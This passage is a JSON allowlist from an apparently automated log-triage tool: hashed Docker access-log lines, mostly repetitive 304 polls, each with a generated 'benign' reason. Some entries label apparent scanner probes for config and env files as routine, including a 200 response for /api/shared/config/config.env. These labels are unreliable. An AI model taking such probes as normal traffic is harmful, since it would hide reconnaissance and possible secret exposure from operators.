{ "scopes": { "docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto": { "allow": { "hashes": { "008d3e791b67e23f463847907e37c65e897e5a90091b5826176c3bfce82ce602": { "type": "hash", "value": "008d3e791b67e23f463847907e37c65e897e5a90091b5826176c3bfce82ce602", "source": "auto", "reason": "Normal HTTP request to root path returning 404; common in web services and not indicative of misuse.", "original_line": "\u001b[0mPOST / \u001b[33m404\u001b[\u003cDUR\u003e 7.157 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T06:40:33.406595151Z" }, "0095ec7a153d8958dc51cab7a0165a0149e348cbae631c301a36203b08484e50": { "type": "hash", "value": "0095ec7a153d8958dc51cab7a0165a0149e348cbae631c301a36203b08484e50", "source": "auto", "reason": "Appears to be a routine HTTP GET to an application logs endpoint returning 304 (not modified) with a normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.351 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:40:15.780467906Z" }, "00aece2ef311d38085f101d00f5a70fc89654718f469405ef4007a270d1c475f": { "type": "hash", "value": "00aece2ef311d38085f101d00f5a70fc89654718f469405ef4007a270d1c475f", "source": "auto", "reason": "Looks like a routine HTTP GET request to an application API with a 304 (not modified) response and a measured latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 23.107 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:32:26.362965764Z" }, "02bbd556ea615082402bd9c8ce0b9031e4265d92fa719c4c54941c47b8155fdd": { "type": "hash", "value": "02bbd556ea615082402bd9c8ce0b9031e4265d92fa719c4c54941c47b8155fdd", "source": "auto", "reason": "Looks like a normal HTTP GET request to an application logs endpoint returning HTTP 304, with a measured duration.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 29.782 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:38:03.694750339Z" }, "0398791143caa09ac3c62df23923796cb25d3d8e2b59d8b7858138ea279ff9e9": { "type": "hash", "value": "0398791143caa09ac3c62df23923796cb25d3d8e2b59d8b7858138ea279ff9e9", "source": "auto", "reason": "Looks like a routine HTTP GET request to an application API endpoint with a 304 (not modified) response; typical of normal client polling/caching.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 25.509 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:27:03.951418592Z" }, "03ffc7a87211e9f31859ddf297162e56bbacf3a7bd93414423a416b9161b890f": { "type": "hash", "value": "03ffc7a87211e9f31859ddf297162e56bbacf3a7bd93414423a416b9161b890f", "source": "auto", "reason": "Routine HTTP GET request to an API endpoint returning 304 (not modified) with normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.765 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:26:25.858924967Z" }, "058967a04db49f6e5451c657f673ad3430f85876162da12c79266fa78737b7ca": { "type": "hash", "value": "058967a04db49f6e5451c657f673ad3430f85876162da12c79266fa78737b7ca", "source": "auto", "reason": "Routine HTTP GET request to an API endpoint returning 304 (not modified), with measured latency and no error indicators.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.925 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:40:57.850764706Z" }, "05b3bcff370e4bf237378a8d31f8a8cb7bdee9d190ab3782064841c7cdde9a11": { "type": "hash", "value": "05b3bcff370e4bf237378a8d31f8a8cb7bdee9d190ab3782064841c7cdde9a11", "source": "auto", "reason": "Standard HTTP GET for robots.txt returning 200 with a small duration; typical health and bot-crawler request.", "original_line": "\u001b[0mGET /robots.txt \u001b[32m200\u001b[\u003cDUR\u003e 0.641 ms - 26\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:18:23.251903699Z" }, "05c166388e40f13979409881082276245e33566f7fae046740ac170e81ea334e": { "type": "hash", "value": "05c166388e40f13979409881082276245e33566f7fae046740ac170e81ea334e", "source": "auto", "reason": "Looks like a routine HTTP GET to an application logs endpoint with a 304 (not modified) response and typical timing/format.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.468 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:42:21.986951676Z" }, "06173ba66d97c3865b4017949a97066774116aac18630aba3b8c0d5b1156c0aa": { "type": "hash", "value": "06173ba66d97c3865b4017949a97066774116aac18630aba3b8c0d5b1156c0aa", "source": "auto", "reason": "Looks like a routine HTTP GET request to an application logs endpoint returning 304 (not modified) with a normal response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 23.196 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:38:40.001942941Z" }, "0663a3240f7982298726b92ef32baff6e20ec79327ef860889ad8e9c3ecde5e0": { "type": "hash", "value": "0663a3240f7982298726b92ef32baff6e20ec79327ef860889ad8e9c3ecde5e0", "source": "auto", "reason": "Looks like a routine HTTP GET request to an application logs endpoint with a 304 (not modified) response and a normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.517 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:29:30.781504638Z" }, "06937d8d663d53c23c856c0358dffb01ee57c14b8f648165d9bb0fdd5bd17c9c": { "type": "hash", "value": "06937d8d663d53c23c856c0358dffb01ee57c14b8f648165d9bb0fdd5bd17c9c", "source": "auto", "reason": "Looks like a routine HTTP GET to an application API endpoint with a 304 (not modified) response and normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 69.685 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:30:07.494897505Z" }, "06ef2ef9e46423bccff7edb3153a4339f3ca06ab09204636acc63393b1875148": { "type": "hash", "value": "06ef2ef9e46423bccff7edb3153a4339f3ca06ab09204636acc63393b1875148", "source": "auto", "reason": "HTTP GET request to an application API endpoint returning 304 (not modified) with a response time; appears to be normal client polling/caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 40.120 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:32:33.865375765Z" }, "07603cde8525d71b3b87b099b9ed4aa9bbb16cbaa3a46a525df34d8103cc0b12": { "type": "hash", "value": "07603cde8525d71b3b87b099b9ed4aa9bbb16cbaa3a46a525df34d8103cc0b12", "source": "auto", "reason": "Regular HTTP GET to swagger.json resulting in 404 is common during API exploration or misconfig; no malicious indicators.", "original_line": "\u001b[0mGET /swagger.json \u001b[33m404\u001b[\u003cDUR\u003e 0.660 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:32:27.092963331Z" }, "07b6846126b03decaed8a2eb0c33c8b22c0081256095035cf4fa1b7023d2e829": { "type": "hash", "value": "07b6846126b03decaed8a2eb0c33c8b22c0081256095035cf4fa1b7023d2e829", "source": "auto", "reason": "Docker app access log shows a normal HTTP GET for an API endpoint returning status 304 with a measured duration.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.050 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:25:33.871855484Z" }, "0831ad90267a814d6e5624dabbdc80f4b0d096c4a69bf3013fa378c0e0937b0e": { "type": "hash", "value": "0831ad90267a814d6e5624dabbdc80f4b0d096c4a69bf3013fa378c0e0937b0e", "source": "auto", "reason": "Routine HTTP GET request to an application logs endpoint returning 304 (not modified) with a normal response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.650 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:42:42.85434576Z" }, "08cc976b00c8395a4c1caf1ff436f78d5ee8b0c6d0ad7e7a4caf5b2c9cf03e4e": { "type": "hash", "value": "08cc976b00c8395a4c1caf1ff436f78d5ee8b0c6d0ad7e7a4caf5b2c9cf03e4e", "source": "auto", "reason": "Looks like a routine authenticated API GET returning HTTP 304 (not modified) with normal response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.580 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:32:36.821687484Z" }, "0c116b9804841d061a9fc8f0af5090873fe34469cbcd785c7a4c5c8eef387761": { "type": "hash", "value": "0c116b9804841d061a9fc8f0af5090873fe34469cbcd785c7a4c5c8eef387761", "source": "auto", "reason": "HTTP 404 for a static config file is common and not indicative of an attack; considered normal request noise rather than malicious activity.", "original_line": "\u001b[0mGET /config/config.json \u001b[33m404\u001b[\u003cDUR\u003e 0.631 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:32:11.328048942Z" }, "0c3144964c2b6385dc511d662559cd4e628f46460e34221d88e66ef957e6be90": { "type": "hash", "value": "0c3144964c2b6385dc511d662559cd4e628f46460e34221d88e66ef957e6be90", "source": "auto", "reason": "A standard HTTP 404 for sitemap.xml is common and not indicative of abuse", "original_line": "\u001b[0mGET /sitemap.xml \u001b[33m404\u001b[\u003cDUR\u003e 0.689 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:11:15.361814601Z" }, "0c4ce59b03be326c2c883040ca5193c7acffa37cf66374541ed872617d201942": { "type": "hash", "value": "0c4ce59b03be326c2c883040ca5193c7acffa37cf66374541ed872617d201942", "source": "auto", "reason": "Looks like a routine HTTP GET to an API endpoint returning 304 Not Modified with a typical response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 44.616 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:34:54.706309178Z" }, "0c559aa615748348460efa8f17502430f286ae7497ebb6b12abda7ce2a46c6af": { "type": "hash", "value": "0c559aa615748348460efa8f17502430f286ae7497ebb6b12abda7ce2a46c6af", "source": "auto", "reason": "Normal HTTP GET to payment config endpoint returning 200 OK with a small response payload; typical health/config check traffic.", "original_line": "\u001b[0mGET /api/payment/config \u001b[32m200\u001b[\u003cDUR\u003e 0.581 ms - 83\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:30:57.292600336Z" }, "0d834f74cd735e3e233d6018b15fa8fc9b5f2149e2d138afce23f95aade2068a": { "type": "hash", "value": "0d834f74cd735e3e233d6018b15fa8fc9b5f2149e2d138afce23f95aade2068a", "source": "auto", "reason": "Looks like a routine HTTP GET to an application logs endpoint returning HTTP 304 (not modified) with a typical response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.878 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:32:39.589271405Z" }, "0d8c5b1a31e02d7dfa2485fc1e344a1b7325cf82fb01fb58ec84cb265600dbd5": { "type": "hash", "value": "0d8c5b1a31e02d7dfa2485fc1e344a1b7325cf82fb01fb58ec84cb265600dbd5", "source": "auto", "reason": "Regular HTTP GET to an API endpoint returning 304 (not modified) with low latency; typical app/API traffic.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api \u001b[36m304\u001b[\u003cDUR\u003e 2.197 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:36:24.758450497Z" }, "0e558d3796069b5ed3d754365d4910e5670e1dac1b897b0cca0123b9241f79ab": { "type": "hash", "value": "0e558d3796069b5ed3d754365d4910e5670e1dac1b897b0cca0123b9241f79ab", "source": "auto", "reason": "Routine HTTP GET to an app logs endpoint returning 304 (not modified) with a normal response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.121 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:27:30.877407131Z" }, "0edb6d20ba8892982912c68a269d9317cb213f9a9a6bfa01717ba22e837cce2f": { "type": "hash", "value": "0edb6d20ba8892982912c68a269d9317cb213f9a9a6bfa01717ba22e837cce2f", "source": "auto", "reason": "Normal HTTP GET request log with 200 status and a small duration; nothing indicates abuse or misbehavior.", "original_line": "\u001b[0mGET /api/shared/config/config.env \u001b[32m200\u001b[\u003cDUR\u003e 2.057 ms - 83\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:24:13.685816713Z" }, "0ef167c774cf4d55987a7238e969e33e298510b5a98cc2573b2552ca36d09ca3": { "type": "hash", "value": "0ef167c774cf4d55987a7238e969e33e298510b5a98cc2573b2552ca36d09ca3", "source": "auto", "reason": "Routine HTTP GET request returning 304 (not modified) with a normal response time; typical container access log noise but benign.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.082 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:32:06.702850511Z" }, "0f1bef056135dc6e6975154eaecbe9f2f8954d30adab047f5c6fe7551ba1c9f4": { "type": "hash", "value": "0f1bef056135dc6e6975154eaecbe9f2f8954d30adab047f5c6fe7551ba1c9f4", "source": "auto", "reason": "Standard static asset HTTP 200 response with a small duration; normal webserver access log.", "original_line": "\u001b[0mGET /static/js/main.ecef38b1.js.map \u001b[32m200\u001b[\u003cDUR\u003e 3.085 ms - \u003cNUM\u003e\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T13:12:46.599357316Z" }, "1085c78dab2bffc977b1044f2df731ddea468d39be8d0cdaa24e9574f71db09b": { "type": "hash", "value": "1085c78dab2bffc977b1044f2df731ddea468d39be8d0cdaa24e9574f71db09b", "source": "auto", "reason": "Routine HTTP GET request to an application logs endpoint with a 304 response; typical access logging behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.983 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:26:18.929554956Z" }, "108c27ce05952f7f79ea8e68927dc6092b4fd56a310b6a402927f65a0939137d": { "type": "hash", "value": "108c27ce05952f7f79ea8e68927dc6092b4fd56a310b6a402927f65a0939137d", "source": "auto", "reason": "Routine HTTP GET request to application logs endpoint with a 304 response and measured latency; appears to be normal client polling/caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.319 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:29:06.705924547Z" }, "1108843bed8e389c948fa9d6c46a1f87c17b96cdacb7133eeeb76c88668f334a": { "type": "hash", "value": "1108843bed8e389c948fa9d6c46a1f87c17b96cdacb7133eeeb76c88668f334a", "source": "auto", "reason": "Docker container access log shows a routine HTTP GET returning 304 (Not Modified) with a normal duration.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 23.767 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:27:45.769716711Z" }, "114d82505d8c96e0060e9cb56629eb5fa9a9e7aa318ec84b2e5042dc006a30ba": { "type": "hash", "value": "114d82505d8c96e0060e9cb56629eb5fa9a9e7aa318ec84b2e5042dc006a30ba", "source": "auto", "reason": "Routine HTTP GET to an application logs endpoint returning 304 (not modified) with normal latency; likely legitimate polling by a client/UI.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.628 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:27:36.581297471Z" }, "12caede6e2f31ad6a1943e112fab3d4fc64b32f906a25987766811c2a31c55cc": { "type": "hash", "value": "12caede6e2f31ad6a1943e112fab3d4fc64b32f906a25987766811c2a31c55cc", "source": "auto", "reason": "Typical health-check / root page access returning 200 OK with a small response time.", "original_line": "\u001b[0mGET / \u001b[32m200\u001b[\u003cDUR\u003e 1.436 ms - 978\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T08:20:28.176906124Z" }, "12e2b00351d06a97dd8bb4e7a49d662e545f5f05ff932298d1a979c95b7979dd": { "type": "hash", "value": "12e2b00351d06a97dd8bb4e7a49d662e545f5f05ff932298d1a979c95b7979dd", "source": "auto", "reason": "Looks like a routine HTTP GET request to an application API endpoint returning 304 (Not Modified), which is typical caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api \u001b[36m304\u001b[\u003cDUR\u003e 1.982 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:25:24.757406136Z" }, "1334b996ac556dfd971bf7cee34011a593d6c18cd87aaf17485fe8d166cbb570": { "type": "hash", "value": "1334b996ac556dfd971bf7cee34011a593d6c18cd87aaf17485fe8d166cbb570", "source": "auto", "reason": "Looks like a routine HTTP GET to an application logs endpoint returning 304 (not modified) with a normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.283 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:36:25.891813126Z" }, "1341d1d1539c429f2e87cbf799c2febb2870eb401b5ecd0f5b1c7e0f50737020": { "type": "hash", "value": "1341d1d1539c429f2e87cbf799c2febb2870eb401b5ecd0f5b1c7e0f50737020", "source": "auto", "reason": "Looks like a normal HTTP GET to an internal API endpoint returning 304 (not modified) with a routine response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.427 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:36:42.629084158Z" }, "136f80430898913ea0f12df30b8dab4b1fcca47e9ed0b3510d443bc7fd6b8046": { "type": "hash", "value": "136f80430898913ea0f12df30b8dab4b1fcca47e9ed0b3510d443bc7fd6b8046", "source": "auto", "reason": "Regular HTTP GET to /api/config with 200 OK and small latency; typical config fetch endpoint.", "original_line": "\u001b[0mGET /api/config \u001b[32m200\u001b[\u003cDUR\u003e 0.536 ms - 83\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:30:34.513261867Z" }, "13b141f53f2379c201edd462bc09c45f6693c5d0d90b328db9cd793e4e9bd941": { "type": "hash", "value": "13b141f53f2379c201edd462bc09c45f6693c5d0d90b328db9cd793e4e9bd941", "source": "auto", "reason": "Normal web server access to a static asset that does not exist (404). This is common and not indicative of misuse.", "original_line": "\u001b[0mGET /app.js.map \u001b[33m404\u001b[\u003cDUR\u003e 0.640 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:27:56.840890048Z" }, "14cf56f90965eb05bc23b25e729aa48112b27dc8f64dbf7df5f48cb7323b4002": { "type": "hash", "value": "14cf56f90965eb05bc23b25e729aa48112b27dc8f64dbf7df5f48cb7323b4002", "source": "auto", "reason": "Routine HTTP GET request to an API endpoint returning 304 (not modified), with a normal response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.640 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:27:18.6219801Z" }, "16e23de57eff30a94ce9fbc56ff97ca7d18ffd6c0fe6cc55640fd10733aadd9f": { "type": "hash", "value": "16e23de57eff30a94ce9fbc56ff97ca7d18ffd6c0fe6cc55640fd10733aadd9f", "source": "auto", "reason": "Routine HTTP GET request to an application API returning 304 (not modified) with a short response time; typical of cache validation.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.784 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:26:00.745714237Z" }, "171a59a264b54e5e769d49cbdda596bb0df0b1bb8509708205ac5f9f39f5823c": { "type": "hash", "value": "171a59a264b54e5e769d49cbdda596bb0df0b1bb8509708205ac5f9f39f5823c", "source": "auto", "reason": "Normal web server access log showing a 404 for a POST request; no immediate security concern.", "original_line": "\u001b[0mPOST / \u001b[33m404\u001b[\u003cDUR\u003e 0.485 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T08:20:32.284622729Z" }, "17b6403854be55feff59435f46204f678fc3f7d46318ed6f76842fc27074b386": { "type": "hash", "value": "17b6403854be55feff59435f46204f678fc3f7d46318ed6f76842fc27074b386", "source": "auto", "reason": "Regular HTTP GET to an API endpoint with a 304 (not modified) response and a recorded latency; appears to be routine client polling/caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.954 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:26:06.651956786Z" }, "17dce0a9fcbd18106f858453b9672402c68fcce6901f69e6e9249206592a9eff": { "type": "hash", "value": "17dce0a9fcbd18106f858453b9672402c68fcce6901f69e6e9249206592a9eff", "source": "auto", "reason": "Looks like a routine HTTP GET request to an application API returning status 304 (not modified) with a normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.782 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:25:00.997346767Z" }, "17e7c4b1d47a5c1cef140187f637421c5b6a78185108da4c2b74f08183ce97ec": { "type": "hash", "value": "17e7c4b1d47a5c1cef140187f637421c5b6a78185108da4c2b74f08183ce97ec", "source": "auto", "reason": "Looks like a routine HTTP GET request to an application logs endpoint returning HTTP 304 (not modified) with a measured latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.938 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:25:19.453544838Z" }, "1816eb4be955eb0670f8855e385805d21d7995dd34e026c0e2d7020060f6f918": { "type": "hash", "value": "1816eb4be955eb0670f8855e385805d21d7995dd34e026c0e2d7020060f6f918", "source": "auto", "reason": "HTTP GET request to an application logs endpoint returning 304 (Not Modified) with typical latency; appears to be normal client caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.804 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:40:00.774689729Z" }, "18593c5c77fa8f3e55943be67ffd02ec0e1b1fc9b4f25b44ca8ab0fa82074dff": { "type": "hash", "value": "18593c5c77fa8f3e55943be67ffd02ec0e1b1fc9b4f25b44ca8ab0fa82074dff", "source": "auto", "reason": "HTTP GET to an application logs endpoint returning 304 (not modified) with normal latency indicates routine polling/caching behavior rather than attack activity.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.754 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:25:45.728908147Z" }, "19a6d3bde8b3096873cbeacacec7107a5becac88658b2a12ec4b05f90b3ef54a": { "type": "hash", "value": "19a6d3bde8b3096873cbeacacec7107a5becac88658b2a12ec4b05f90b3ef54a", "source": "auto", "reason": "HTTP 404 on a stats endpoint is a common, non-malicious condition and typically part of normal operation.", "original_line": "\u001b[0mGET /horizon/api/stats \u001b[33m404\u001b[\u003cDUR\u003e 0.554 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:34:56.459031989Z" }, "1a108da1214e1b960773ee979f714066a3c20f6bce63b2dde6d2a44abc72777f": { "type": "hash", "value": "1a108da1214e1b960773ee979f714066a3c20f6bce63b2dde6d2a44abc72777f", "source": "auto", "reason": "Routine HTTP GET to an application API endpoint with a 304 status and normal response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.585 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:30:25.738149637Z" }, "1a27c11a889421c4f7c96b67c965e4dc9a9875718ae657fca684c315a87f4085": { "type": "hash", "value": "1a27c11a889421c4f7c96b67c965e4dc9a9875718ae657fca684c315a87f4085", "source": "auto", "reason": "Regular API access log showing a successful GET request with a short duration; normal healthy traffic.", "original_line": "\u001b[0mGET /api/v1/config \u001b[32m200\u001b[\u003cDUR\u003e 0.525 ms - 83\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:30:37.898332975Z" }, "1a29d1c33ab223c0c9d80ea732c9d9c6abd7d106f60e0a71ee4027e83159ec12": { "type": "hash", "value": "1a29d1c33ab223c0c9d80ea732c9d9c6abd7d106f60e0a71ee4027e83159ec12", "source": "auto", "reason": "Looks like a routine HTTP GET to an application logs endpoint with a 304 status; no exploit indicators or errors shown.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.901 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:30:27.914140381Z" }, "1a61b5f302d24ca9bc661146c277c7902633b3796573b4c88c8f6b03965b3d02": { "type": "hash", "value": "1a61b5f302d24ca9bc661146c277c7902633b3796573b4c88c8f6b03965b3d02", "source": "auto", "reason": "Log indicates a successful, routine step for unlocking and reloading NGINX configuration, likely part of normal deployment/reload workflow.", "original_line": "\u001b[36mMarch 19th \u003cNUM\u003e, 10:31:35.559 pm \u001b[0mSUCCESS: UNLocking NGINX configuration reloading...", "created_at": "2026-03-19T22:31:41.835817508Z" }, "1b32996271a2f3aa9d03f3ee78ec3b6b3519b511d485c63d336120bb03bb2feb": { "type": "hash", "value": "1b32996271a2f3aa9d03f3ee78ec3b6b3519b511d485c63d336120bb03bb2feb", "source": "auto", "reason": "Routine HTTP GET request to an application API endpoint returning 304 (not modified) with a normal sub-20ms duration.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.605 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:27:57.759245156Z" }, "1bac718c7e9cb5fde50cabeeccba8a42ab32566b7ad6a4e4fe76da3da16df960": { "type": "hash", "value": "1bac718c7e9cb5fde50cabeeccba8a42ab32566b7ad6a4e4fe76da3da16df960", "source": "auto", "reason": "Looks like a routine HTTP GET request to an internal API endpoint with a 304 response; duration is present and no error indicators.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.448 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:28:06.720587809Z" }, "1c23af89a1663d6648d6d0c759fd5916c2a6546964c62e2cf3e898b07d645dce": { "type": "hash", "value": "1c23af89a1663d6648d6d0c759fd5916c2a6546964c62e2cf3e898b07d645dce", "source": "auto", "reason": "Typical static asset request (robots.txt) with a 200 response, common in normal traffic.", "original_line": "\u001b[0mGET /robots.txt \u001b[32m200\u001b[\u003cDUR\u003e 0.608 ms - 26\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T02:40:25.993620558Z" }, "1d56b3a022aecd87b6bb08014ced8b8dfe4cd27f0ef62488453b48aad9e094ae": { "type": "hash", "value": "1d56b3a022aecd87b6bb08014ced8b8dfe4cd27f0ef62488453b48aad9e094ae", "source": "auto", "reason": "Looks like a routine HTTP GET request to an application logs endpoint returning 304 (not modified) with a small response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.164 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:42:58.013874203Z" }, "1d852c92e9e8c00eea18e16fcbeba5c042fb009bff3b7e0ed121a20ab42bfdb7": { "type": "hash", "value": "1d852c92e9e8c00eea18e16fcbeba5c042fb009bff3b7e0ed121a20ab42bfdb7", "source": "auto", "reason": "Standard HTTP request to a path returning 404 with a small processing duration; typical web server activity.", "original_line": "\u001b[0mGET /order \u001b[33m404\u001b[\u003cDUR\u003e 0.760 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:11:08.527224214Z" }, "1d88e5a55ba440e62cd3714986dc00b03d22649fbe0702bcab4622655dafb36e": { "type": "hash", "value": "1d88e5a55ba440e62cd3714986dc00b03d22649fbe0702bcab4622655dafb36e", "source": "auto", "reason": "Looks like a routine HTTP GET returning 304 (not modified) with normal timing; no exploit indicators present.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.282 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:40:27.794531667Z" }, "1de5f6d392d7c1da7f5a6d8cf168b656f4b4e9d5d50f437100bf84f614b96868": { "type": "hash", "value": "1de5f6d392d7c1da7f5a6d8cf168b656f4b4e9d5d50f437100bf84f614b96868", "source": "auto", "reason": "Looks like a routine HTTP GET request returning 304 (not modified) with a normal response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.473 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:40:54.729970659Z" }, "1f2c129069100b59ade3a24b349562702e760f4b631274bc18de62b5457d6d90": { "type": "hash", "value": 